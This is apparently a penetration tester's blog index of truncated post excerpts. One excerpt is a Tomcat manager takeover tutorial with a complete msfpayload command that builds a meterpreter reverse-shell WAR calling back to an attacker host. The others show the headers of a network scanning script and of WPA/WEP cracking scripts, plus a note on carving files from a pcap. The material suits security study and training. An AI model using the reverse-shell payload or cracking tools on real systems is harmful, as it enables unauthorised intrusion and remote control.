So, you’ve just brute-forced the admin password for the Tomcat web app manager and you want to take it a step further… Step in Metasploit.

msfpayload can create a WAR file containing a payload which you can upload to the target and exploit the box.

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W > /root/MetRev.war

Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.

Once uploaded you then need to connect… Continue reading

Here’s my automated scanning script. It’s got a few dependencies but will run with a number of threads and will output to a defined folder.

#!/bin/bash
#__________________________________________________________
# Author:     phillips321 forum.gnacktrack.co.uk
# License:    CC BY-SA 3.0
# Use:        Update several applications
# Released:   www.gnacktrack.co.uk
version=1.0
# Dependencies:
#           nmap
#           sslscan
#… Continue reading

So on a job I had captured some data transfer off the wire but wanted to put some proof of that in the report and for some brownie points.

I wasn’t entirely sure what tool to use but a quick Google pointed me in the direction of foremost.

The pcap was captured in Wireshark so I opened it up again and found the correct TCP stream that contained what… Continue reading

I have written an automated WPA cracking script (matts-wpacrack.sh). Let me know if you have any improvements.

#!/bin/bash
# wpacrack.sh v.1.1
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
#
VERSION="1.1"
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.1 - Randomises MAC Address on start
# Version 1.0 - First Release
#################################################################
# CHECKING… Continue reading

I have written an automated WEP cracking script (matts-wepcrack.sh). Let me know if you have any improvements.

#!/bin/bash
# wepcrack.sh v1.3
# Create by Matthew Phillips
# New versions can be downloaded from www.phillips321.co.uk
VERSION="1.3"
#
# This tool requires aircrack-ng tools to be installed and run as root
#
# ChangeLog....
# Version 1.3 - Randomises interface MAC address
# Version 1.2 - Set txpower of card to 1000mw… Continue reading